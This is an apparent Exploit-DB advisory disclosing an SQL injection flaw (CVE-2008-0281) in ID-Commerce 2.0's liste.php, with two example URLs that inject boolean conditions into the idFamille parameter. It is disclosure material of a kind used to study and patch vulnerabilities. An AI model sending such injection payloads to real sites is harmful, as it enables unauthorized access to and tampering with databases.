ID-Commerce 2.0 - 'liste.php' SQL Injection

Author: consultant.securite
type: webapps
platform: php
port: 
date_added: 2008-01-10  
date_updated: 2014-01-17  
verified: 1  
codes: CVE-2008-0281;OSVDB-40339  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 31009.txt  
source: https://www.securityfocus.com/bid/27220/info

ID-Commerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/liste.php?idFamille=1%20or%201=1#
http://www.example.com/liste.php?idFamille=1%20or%201=0#